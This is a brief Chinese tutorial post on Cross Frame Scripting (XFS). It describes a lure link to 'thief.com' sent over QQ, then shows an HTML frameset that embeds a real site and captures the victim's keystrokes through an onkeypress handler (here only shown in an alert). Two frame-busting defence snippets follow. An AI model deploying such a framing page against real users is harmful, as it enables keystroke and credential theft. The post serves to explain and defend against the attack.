XFS攻击一例
XFS: Cross Frame Script (跨框架脚本) 攻击。
什么是XFS攻击,下面举一个例子:
Tom在QQ上发消息诱骗Jerry点击了下面的连接:
http://thief.com
<html><head><title>IE Cross Frame Scripting Restriction Bypass Example</title><script>function alertKey(e) {alert("key press = '" + e.which + "'");}</script></head><frameset onload="this.focus();" onblur="this.focus();" cols="100%" onkeypress="alertKey(event);"> <frame src="http://cuishen.iteye.com/" scrolling="auto"></frameset></html>
<style> html { visibility:hidden; } </style> <script> if( self == top){ document.documentElement.style.visibility='visible'; }else{ top.location = self.location; } </script>
if top <> self then if top.location.hostname <> self.location.hostname then top.location = "http://cuishen.iteye.com/" end ifend if